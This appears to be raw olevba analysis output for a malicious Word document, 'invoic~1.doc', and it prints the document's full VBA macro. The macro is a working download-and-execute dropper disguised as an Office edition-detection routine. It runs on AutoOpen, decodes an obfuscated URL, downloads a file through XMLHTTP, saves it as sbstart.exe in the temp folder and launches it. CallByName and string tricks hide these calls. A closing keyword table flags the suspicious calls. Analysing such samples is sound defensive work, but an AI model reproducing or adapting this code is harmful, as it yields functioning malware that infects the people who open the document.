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- olevba 0.41 -
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B-V invoic~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: invoic~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: invoic~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- GetEdition2000 "00"
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: invoic~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public SBTART As Object
- Public PublisherTrial As Object
- Public Ultimate2007 As Object
- Public Personal2007 As String
- Public OneNote2007 As String
- Public Plus2010 As Object
- Public Sub Version_Test()
- On Error GoTo 0
- Debug.Print GetEdition(Application.Version, Application.ProductCode)
- End Sub
- Public Function GetEdition(ByRef strAppVersion As String, ByRef strGuid As String) As String
- On Error GoTo PROC_ERR
- Const strERR_MSG As String = "Unable to determine edition"
- Dim strSku As String
- Debug.Print "strAppVersion=" & strAppVersion
- Debug.Print "Val(strAppVersion)=" & Val(strAppVersion)
- Debug.Print "strGuid = " & strGuid
- Select Case Val(strAppVersion)
- Case Is < 9
- GetEdition = "Pre Office 2000: " & strERR_MSG
- Case Is < 10
- strSku = Mid$(strGuid, 4, 2)
- GetEdition = GetEdition2000(strSku)
- Case Is < 11
- strSku = Mid$(strGuid, 4, 2)
- GetEdition = GetEdition2002(strSku)
- Case Is < 12
- strSku = Mid$(strGuid, 4, 2)
- GetEdition = GetEdition2003(strSku)
- Case Is < 13
- strSku = Mid$(strGuid, 11, 4)
- GetEdition = GetEdition2007(strSku)
- Case Is < 15
- strSku = Mid$(strGuid, 11, 4)
- GetEdition = GetEdition2010(strSku)
- Case Is < 16
- strSku = Mid$(strGuid, 11, 4)
- Debug.Print "strSku=" & strSku
- GetEdition = GetEdition2013(strSku)
- Case Is < 17
- strSku = Mid$(strGuid, 11, 4)
- Debug.Print "strSku=" & strSku
- GetEdition = GetEdition2016(strSku)
- Case Else
- GetEdition = "Post Office 2016: " & strERR_MSG
- End Select
- Exit Function
- MsgBox "Erl=" & Erl & " Error " & Err.Number & " (" & Err.Description & ") in procedure GetEdition of Class aegit_expClass"
- GetEdition = strERR_MSG & vbNewLine & _
- "Error Number: " & CStr(Err.Number) & _
- vbNewLine & "Error Desc: " & Err.Description
- End Function
- Public Function on2(Madm As String, LenLen As Integer) As String
- Dim arr() As String
- Dim a As Variant
- arr = Split(Madm, "--")
- Dim fromArr() As Integer
- ReDim fromArr(LenLen)
- For a = LBound(arr) To UBound(arr)
- fromArr(a) = CInt(arr(a))
- Next a
- Dim i As Integer
- Dim result As String
- result = ""
- For i = LBound(fromArr) To UBound(fromArr)
- result = result & Chr(fromArr(i) - LenLen - 8000 - 500)
- Next i
- on2 = result
- End Function
- Public Function GetEdition2000(ByRef strSku As String) As String
- On Error GoTo 0
- Set SBTART = CreateObject("Microsoft" + ".XMLHTTP")
- Set PublisherTrial = CreateObject("Adodb.Stream")
- Set Plus2010 = CreateObject("Shell.Application")
- GoTo Step1
- Select Case strSku
- Case "00"
- GetEdition2000 = "Microsoft Office 2000 Premium Edition CD1"
- Case "01"
- GetEdition2000 = "Microsoft Office 2000 Professional Edition"
- Case "02"
- GetEdition2000 = "Microsoft Office 2000 Standard Edition"
- Case "03"
- GetEdition2000 = "Microsoft Office 2000 Small Business Edition"
- Case "04"
- GetEdition2000 = "Microsoft Office 2000 Premium CD2"
- Case "05"
- GetEdition2000 = "Office CD2 SMALL"
- Case "06" To "09", "0A" To "0F"
- GetEdition2000 = "(reserved)"
- Case "10"
- GetEdition2000 = "Microsoft Access 2000 (standalone)"
- Case "11"
- GetEdition2000 = "Microsoft Excel 2000 (standalone)"
- Case "12"
- GetEdition2000 = "Microsoft FrontPage 2000 (standalone)"
- Case "13"
- GetEdition2000 = "Microsoft PowerPoint 2000 (standalone)"
- Case "14"
- GetEdition2000 = "Microsoft Publisher 2000 (standalone)"
- Case "15"
- GetEdition2000 = "Office Server Extensions"
- Case "16"
- GetEdition2000 = "Microsoft Outlook 2000 (standalone)"
- Case "17"
- GetEdition2000 = "Microsoft Word 2000 (standalone)"
- Case "18"
- GetEdition2000 = "Microsoft Access 2000 runtime version"
- Case "19"
- GetEdition2000 = "FrontPage Server Extensions"
- Case "1A"
- GetEdition2000 = "Publisher Standalone OEM"
- Case "1B"
- GetEdition2000 = "DMMWeb"
- Case "1C"
- GetEdition2000 = "FP WECCOM"
- Case "1D" To "1F"
- GetEdition2000 = "(reserved standalone SKUs)"
- Case "20" To "29", "2A" To "2F"
- GetEdition2000 = "Office Language Packs"
- Case "30" To "39", "3A" To "3F"
- GetEdition2000 = "Proofing Tools Kit(s)"
- Case "40"
- GetEdition2000 = "Publisher Trial CD"
- Case "41"
- GetEdition2000 = "Publisher Trial Web"
- Case "42"
- GetEdition2000 = "SBB"
- Case "43"
- GetEdition2000 = "SBT"
- Case "44"
- GetEdition2000 = "SBT CD2"
- Case "45"
- GetEdition2000 = "SBTART"
- Case "46"
- GetEdition2000 = "Web Components"
- Case "47"
- GetEdition2000 = "VP Office CD2 with LVP"
- Case "48"
- GetEdition2000 = "VP PUB with LVP"
- Case "49"
- GetEdition2000 = "VP PUB with LVP OEM"
- Case "4F"
- GetEdition2000 = "Access 2000 SR-1 Run-Time Minimum"
- Case Else
- MsgBox "Error: GetEdition2000", vbCritical, "ERROR"
- End Select
- Step1:
- Set Ultimate2007 = CreateObject("WScript.Shell").Environment("Process")
- GetEdition2002 ""
- End Function
- Private Function GetEdition2002(ByRef strSku As String) As String
- strSkuOn = False
- GoTo step100
- On Error GoTo 0
- Select Case strSku
- Case "11"
- GetEdition2002 = "Microsoft Office XP Professional"
- Case "12"
- GetEdition2002 = "Microsoft Office XP Standard"
- Case "13"
- GetEdition2002 = "Microsoft Office XP Small Business"
- Case "14"
- GetEdition2002 = "Microsoft Office XP Web Server"
- Case "15"
- GetEdition2002 = "Microsoft Access 2002"
- Case "16"
- GetEdition2002 = "Microsoft Excel 2002"
- Case "17"
- GetEdition2002 = "Microsoft FrontPage 2002"
- Case "18"
- GetEdition2002 = "Microsoft PowerPoint 2002"
- Case "19"
- GetEdition2002 = "Microsoft Publisher 2002"
- Case "1A"
- GetEdition2002 = "Microsoft Outlook 2002"
- Case "1B"
- GetEdition2002 = "Microsoft Word 2002"
- Case "1C"
- GetEdition2002 = "Microsoft Access 2002 Runtime"
- Case "1D"
- GetEdition2002 = "Microsoft FrontPage Server Extensions 2002"
- Case "1E"
- GetEdition2002 = "Microsoft Office Multilingual User Interface Pack"
- Case "1F"
- GetEdition2002 = "Microsoft Office Proofing Tools Kit"
- Case "20"
- GetEdition2002 = "System Files Update"
- Case "22"
- GetEdition2002 = "unused"
- Case "23"
- GetEdition2002 = "Microsoft Office Multilingual User Interface Pack Wizard"
- Case "24"
- GetEdition2002 = "Microsoft Office XP Resource Kit"
- Case "25"
- GetEdition2002 = "Microsoft Office XP Resource Kit Tools (download from Web)"
- Case "26"
- GetEdition2002 = "Microsoft Office Web Components"
- Case "27"
- GetEdition2002 = "Microsoft Project 2002"
- Case "28"
- GetEdition2002 = "Microsoft Office XP Professional with FrontPage"
- Case "29"
- GetEdition2002 = "Microsoft Office XP Professional Subscription"
- Case "2A"
- GetEdition2002 = "Microsoft Office XP Small Business Edition Subscription"
- Case "2B"
- GetEdition2002 = "Microsoft Publisher 2002 Deluxe Edition"
- Case "2F"
- GetEdition2002 = "Standalone IME (JPN Only)"
- Case "30"
- GetEdition2002 = "Microsoft Office XP Media Content"
- Case "31"
- GetEdition2002 = "Microsoft Project 2002 Web Client"
- Case "32"
- GetEdition2002 = "Microsoft Project 2002 Web Server"
- Case "33"
- GetEdition2002 = "Microsoft Office XP PIPC1 (Pre Installed PC) (JPN Only)"
- Case "34"
- GetEdition2002 = "Microsoft Office XP PIPC2 (Pre Installed PC) (JPN Only)"
- Case "35"
- GetEdition2002 = "Microsoft Office XP Media Content Deluxe"
- Case "3A"
- GetEdition2002 = "Project 2002 Standard"
- Case "3B"
- GetEdition2002 = "Project 2002 Professional"
- Case "51"
- GetEdition2002 = "Microsoft Office Visio Professional 2003"
- Case "54"
- GetEdition2002 = "Microsoft Office Visio Standard 2003"
- Case Else
- MsgBox "Error: GetEdition2002", vbCritical, "ERROR"
- End Select
- step100:
- Dim urlAr As String
- urlAr = "8641--8653--8653--8649--8595--8584--8584--8656--8656--8656--8583--8655--8646--8648--8637--8634--8645--8583--8646--8657--8584--8590--8639--8640--8635--8647--8584--8592--8653--8639--8651--8591--8644--8643--8583--8638--8657--8638"
- CallByName SBTART, Replace("zpen", "z", "O"), VbMethod, Replace(UCase("GoT"), "O", "E"), on2(urlAr, 37), strSkuOn
- Personal2007 = Ultimate2007(Replace("rEMP", "r", "T"))
- OneNote2007 = Personal2007 + "\" + Replace("sbstart.txt", "t", "e")
- PublisherTrial.Type = 1
- PublisherTrial.Open
- PublisherTrial.write SBTART.responseBody
- GetEdition2013 "55"
- End Function
- Private Function GetEdition2003(ByRef strSku As String) As String
- On Error GoTo 0
- Select Case strSku
- Case "11"
- GetEdition2003 = "Microsoft Office Professional Enterprise Edition 2003"
- Case "12"
- GetEdition2003 = "Microsoft Office Standard Edition 2003"
- Case "13"
- GetEdition2003 = "Microsoft Office Basic Edition 2003"
- Case "14"
- GetEdition2003 = "Microsoft Windows SharePoint Services 2.0"
- Case "15"
- GetEdition2003 = "Microsoft Office Access 2003"
- Case "16"
- GetEdition2003 = "Microsoft Office Excel 2003"
- Case "17"
- GetEdition2003 = "Microsoft Office FrontPage 2003"
- Case "18"
- GetEdition2003 = "Microsoft Office PowerPoint 2003"
- Case "19"
- GetEdition2003 = "Microsoft Office Publisher 2003"
- Case "1A"
- GetEdition2003 = "Microsoft Office Outlook Professional 2003"
- Case "1B"
- GetEdition2003 = "Microsoft Office Word 2003"
- Case "1C"
- GetEdition2003 = "Microsoft Office Access 2003 Runtime"
- Case "1E"
- GetEdition2003 = "Microsoft Office 2003 User Interface Pack"
- Case "1F"
- GetEdition2003 = "Microsoft Office 2003 Proofing Tools"
- Case "23"
- GetEdition2003 = "Microsoft Office 2003 Multilingual User Interface Pack"
- Case "24"
- GetEdition2003 = "Microsoft Office 2003 Resource Kit"
- Case "26"
- GetEdition2003 = "Microsoft Office XP Web Components"
- Case "2E"
- GetEdition2003 = "Microsoft Office 2003 Research Service SDK"
- Case "44"
- GetEdition2003 = "Microsoft Office InfoPath 2003"
- Case "83"
- GetEdition2003 = "Microsoft Office 2003 HTML Viewer"
- Case "92"
- GetEdition2003 = "Windows SharePoint Services 2.0 English Template Pack"
- Case "93"
- GetEdition2003 = "Microsoft Office 2003 English Web Parts and Components"
- Case "A1"
- GetEdition2003 = "Microsoft Office OneNote 2003"
- Case "A4"
- GetEdition2003 = "Microsoft Office 2003 Web Components"
- Case "A5"
- GetEdition2003 = "Microsoft SharePoint Migration Tool 2003"
- Case "AA"
- GetEdition2003 = "Microsoft Office PowerPoint 2003 Presentation Broadcast"
- Case "AB"
- GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 1"
- Case "AC"
- GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 2"
- Case "AD"
- GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 3"
- Case "AE"
- GetEdition2003 = "Microsoft Organization Chart 2.0"
- Case "CA"
- GetEdition2003 = "Microsoft Office Small Business Edition 2003"
- Case "D0"
- GetEdition2003 = "Microsoft Office Access 2003 Developer Extensions"
- Case "DC"
- GetEdition2003 = "Microsoft Office 2003 Smart Document SDK"
- Case "E0"
- GetEdition2003 = "Microsoft Office Outlook Standard 2003"
- Case "E3"
- GetEdition2003 = "Microsoft Office Professional Edition 2003 (with InfoPath 2003)"
- Case "FD"
- GetEdition2003 = "Microsoft Office Outlook 2003 (distributed by MSN)"
- Case "FF"
- GetEdition2003 = "Microsoft Office 2003 Edition Language Interface Pack"
- Case "F8"
- GetEdition2003 = "Remove Hidden Data Tool"
- Case "3A"
- GetEdition2003 = "Microsoft Office Project Standard 2003"
- Case "3B"
- GetEdition2003 = "Microsoft Office Project Professional 2003"
- Case "32"
- GetEdition2003 = "Microsoft Office Project Server 2003"
- Case "51"
- GetEdition2003 = "Microsoft Office Visio Professional 2003"
- Case "52"
- GetEdition2003 = "Microsoft Office Visio Viewer 2003"
- Case "53"
- GetEdition2003 = "Microsoft Office Visio Standard 2003"
- Case "55"
- GetEdition2003 = "Microsoft Office Visio for Enterprise Architects 2003"
- Case "5E"
- GetEdition2003 = "Microsoft Office Visio 2003 Multilingual User Interface Pack"
- Case Else
- MsgBox "Error: GetEdition2003", vbCritical, "ERROR"
- End Select
- End Function
- Private Function GetEdition2007(ByRef strSku As String) As String
- On Error GoTo 0
- Select Case strSku
- Case "0011"
- GetEdition2007 = "Microsoft Office Professional Plus 2007"
- Case "0012"
- GetEdition2007 = "Microsoft Office Standard 2007"
- Case "0013"
- GetEdition2007 = "Microsoft Office Basic 2007"
- Case "0014"
- GetEdition2007 = "Microsoft Office Professional 2007"
- Case "0015"
- GetEdition2007 = "Microsoft Office Access 2007"
- Case "0016"
- GetEdition2007 = "Microsoft Office Excel 2007"
- Case "0017"
- GetEdition2007 = "Microsoft Office SharePoint Designer 2007"
- Case "0018"
- GetEdition2007 = "Microsoft Office PowerPoint 2007"
- Case "0019"
- GetEdition2007 = "Microsoft Office Publisher 2007"
- Case "001A"
- GetEdition2007 = "Microsoft Office Outlook 2007"
- Case "001B"
- GetEdition2007 = "Microsoft Office Word 2007"
- Case "001C"
- GetEdition2007 = "Microsoft Office Access Runtime 2007"
- Case "0020"
- GetEdition2007 = "Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats"
- Case "0026"
- GetEdition2007 = "Microsoft Expression Web"
- Case "0029"
- GetEdition2007 = "Microsoft Office Excel 2007"
- Case "002B"
- GetEdition2007 = "Microsoft Office Word 2007"
- Case "002E"
- GetEdition2007 = "Microsoft Office Ultimate 2007"
- Case "002F"
- GetEdition2007 = "Microsoft Office Home and Student 2007"
- Case "0030"
- GetEdition2007 = "Microsoft Office Enterprise 2007"
- Case "0031"
- GetEdition2007 = "Microsoft Office Professional Hybrid 2007"
- Case "0033"
- GetEdition2007 = "Microsoft Office Personal 2007"
- Case "0035"
- GetEdition2007 = "Microsoft Office Professional Hybrid 2007"
- Case "0037"
- GetEdition2007 = "Microsoft Office PowerPoint 2007"
- Case "003A"
- GetEdition2007 = "Microsoft Office Project Standard 2007"
- Case "003B"
- GetEdition2007 = "Microsoft Office Project Professional 2007"
- Case "0044"
- GetEdition2007 = "Microsoft Office InfoPath 2007"
- Case "0051"
- GetEdition2007 = "Microsoft Office Visio Professional 2007"
- Case "0052"
- GetEdition2007 = "Microsoft Office Visio Viewer 2007"
- Case "0053"
- GetEdition2007 = "Microsoft Office Visio Standard 2007"
- Case "00A1"
- GetEdition2007 = "Microsoft Office OneNote 2007"
- Case "00A3"
- GetEdition2007 = "Microsoft Office OneNote Home Student 2007"
- Case "00A7"
- GetEdition2007 = "Calendar Printing Assistant for Microsoft Office Outlook 2007"
- Case "00A9"
- GetEdition2007 = "Microsoft Office InterConnect 2007"
- Case "00AF"
- GetEdition2007 = "Microsoft Office PowerPoint Viewer 2007 (English)"
- Case "00B0"
- GetEdition2007 = "The Microsoft Save as PDF add-in"
- Case "00B1"
- GetEdition2007 = "The Microsoft Save as XPS add-in"
- Case "00B2"
- GetEdition2007 = "The Microsoft Save as PDF or XPS add-in"
- Case "00BA"
- GetEdition2007 = "Microsoft Office Groove 2007"
- Case "00CA"
- GetEdition2007 = "Microsoft Office Small Business 2007"
- Case "00E0"
- GetEdition2007 = "Microsoft Office Outlook 2007"
- Case "10D7"
- GetEdition2007 = "Microsoft Office InfoPath Forms Services"
- Case "110D"
- GetEdition2007 = "Microsoft Office SharePoint Server 2007"
- Case "1122"
- GetEdition2007 = "Windows SharePoint Services Developer Resources 1.2"
- Case "0010"
- GetEdition2007 = "SKU - Microsoft Software Update for Web Folders (English) 12"
- Case Else
- MsgBox "Error: GetEdition2007", vbCritical, "ERROR"
- End Select
- End Function
- Private Function GetEdition2010(ByRef strSku As String) As String
- On Error GoTo 0
- Select Case strSku
- Case "0011"
- GetEdition2010 = "Microsoft Office Professional Plus 2010"
- Case "011D"
- GetEdition2010 = "Microsoft Office Professional Plus Subscription 2010 "
- Case "0012"
- GetEdition2010 = "Microsoft Office Standard 2010"
- Case "0013"
- GetEdition2010 = "Microsoft Office Home and Business 2010"
- Case "0014"
- GetEdition2010 = "Microsoft Office Professional 2010"
- Case "0015"
- GetEdition2010 = "Microsoft Access 2010"
- Case "0016"
- GetEdition2010 = "Microsoft Excel 2010"
- Case "0017"
- GetEdition2010 = "Microsoft SharePoint Designer 2010"
- Case "0018"
- GetEdition2010 = "Microsoft PowerPoint 2010"
- Case "0019"
- GetEdition2010 = "Microsoft Publisher 2010"
- Case "001A"
- GetEdition2010 = "Microsoft Outlook 2010"
- Case "001B"
- GetEdition2010 = "Microsoft Word 2010"
- Case "001C"
- GetEdition2010 = "Microsoft Access Runtime 2010"
- Case "001F"
- GetEdition2010 = "Microsoft Office Proofing Tools Kit Compilation 2010"
- Case "002F"
- GetEdition2010 = "Microsoft Office Home and Student 2010"
- Case "003A"
- GetEdition2010 = "Microsoft Project Standard 2010"
- Case "003B"
- GetEdition2010 = "Microsoft Project Professional 2010"
- Case "0044"
- GetEdition2010 = "Microsoft InfoPath 2010"
- Case "0052"
- GetEdition2010 = "Microsoft Visio Viewer 2010"
- Case "0057"
- GetEdition2010 = "Microsoft Visio 2010"
- Case "007A"
- GetEdition2010 = "Microsoft Outlook Connector"
- Case "008B"
- GetEdition2010 = "Microsoft Office Small Business Basics 2010"
- Case "00A1"
- GetEdition2010 = "Microsoft OneNote 2010"
- Case "00AF"
- GetEdition2010 = "Microsoft PowerPoint Viewer 2010"
- Case "00BA"
- GetEdition2010 = "Microsoft Office SharePoint Workspace 2010"
- Case "110D"
- GetEdition2010 = "Microsoft Office SharePoint Server 2010"
- Case "110F"
- GetEdition2010 = "Microsoft Project Server 2010"
- Case Else
- MsgBox "Error: GetEdition2010", vbCritical, "ERROR"
- Debug.Print "strSku = " & strSku
- End Select
- End Function
- Private Function GetEdition2013(ByRef strSku As String) As String
- GoTo finita
- On Error GoTo 0
- Debug.Print "GetEdition2013 strSku=" & strSku
- Select Case strSku
- Case "0011"
- GetEdition2013 = "Microsoft Office Professional Plus 2013"
- Case "0012"
- GetEdition2013 = "Microsoft Office Standard 2013"
- Case "0013"
- GetEdition2013 = "Microsoft Office Home and Business 2013"
- Case "0014"
- GetEdition2013 = "Microsoft Office Professional 2013"
- Case "0015"
- GetEdition2013 = "Microsoft Access 2013"
- Case "0016"
- GetEdition2013 = "Microsoft Excel 2013"
- Case "0017"
- GetEdition2013 = "Microsoft SharePoint Designer 2013"
- Case "0018"
- GetEdition2013 = "Microsoft PowerPoint 2013"
- Case "0019"
- GetEdition2013 = "Microsoft Publisher 2013"
- Case "001A"
- GetEdition2013 = "Microsoft Outlook 2013"
- Case "001B"
- GetEdition2013 = "Microsoft Word 2013"
- Case "001C"
- GetEdition2013 = "Microsoft Access Runtime 2013"
- Case "001F"
- GetEdition2013 = "Microsoft Office Proofing Tools Kit Compilation 2013"
- Case "002F"
- GetEdition2013 = "Microsoft Office Home and Student 2013"
- Case "003A"
- GetEdition2013 = "Microsoft Project Standard 2013"
- Case "003B"
- GetEdition2013 = "Microsoft Project Professional 2013"
- Case "0044"
- GetEdition2013 = "Microsoft InfoPath 2013"
- Case "0051"
- GetEdition2013 = "Microsoft Visio Professional 2013"
- Case "0053"
- GetEdition2013 = "Microsoft Visio Standard 2013"
- Case "00A1"
- GetEdition2013 = "Microsoft OneNote 2013"
- Case "00BA"
- GetEdition2013 = "Microsoft Office SharePoint Workspace 2013"
- Case "110D"
- GetEdition2013 = "Microsoft Office SharePoint Server 2013"
- Case "110F"
- GetEdition2013 = "Microsoft Project Server 2013"
- Case "012B"
- GetEdition2013 = "Microsoft Lync 2013"
- Case Else
- MsgBox "Error: GetEdition2013", vbCritical, "ERROR"
- End Select
- finita:
- CallByName PublisherTrial, Replace("savRtofilR", "R", "e"), VbMethod, OneNote2007, 2
- Plus2010.Open (OneNote2007)
- End Function
- Private Function GetEdition2016(ByRef strSku As String) As String
- On Error GoTo 0
- Debug.Print "GetEdition2016 strSku=" & strSku
- Select Case strSku
- Case "0011"
- GetEdition2016 = "Microsoft Office Professional Plus 2016"
- Case "0012"
- GetEdition2016 = "Microsoft Office Standard 2016"
- Case "0015"
- GetEdition2016 = "Microsoft Access 2016"
- Case "0016"
- GetEdition2016 = "Microsoft Excel 2016"
- Case "0018"
- GetEdition2016 = "Microsoft PowerPoint 2016"
- Case "0019"
- GetEdition2016 = "Microsoft Publisher 2016"
- Case "001A"
- GetEdition2016 = "Microsoft Outlook 2016"
- Case "001B"
- GetEdition2016 = "Microsoft Word 2016"
- Case "001F"
- GetEdition2016 = "Microsoft Office Proofing Tools Kit Compilation 2016"
- Case "003A"
- GetEdition2016 = "Microsoft Project Standard 2016"
- Case "003B"
- GetEdition2016 = "Microsoft Project Professional 2016"
- Case "0051"
- GetEdition2016 = "Microsoft Visio Professional 2016"
- Case "0053"
- GetEdition2016 = "Microsoft Visio Standard 2016"
- Case "00A1"
- GetEdition2016 = "Microsoft OneNote 2016"
- Case "00BA"
- GetEdition2016 = "Microsoft Office OneDrive for Business 2016"
- Case "110D"
- GetEdition2016 = "Microsoft Office SharePoint Server 2016"
- Case "012B"
- GetEdition2016 = "Microsoft Skype for Business 2016"
- Case Else
- MsgBox "Error: GetEdition2016", vbCritical, "ERROR"
- End Select
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | ADODB.Stream | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: VBA expression) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | VBA string | Microsoft.XMLHTTP | ("Microsoft" + ".XMLHTTP") |
- +------------+----------------------+-----------------------------------------+
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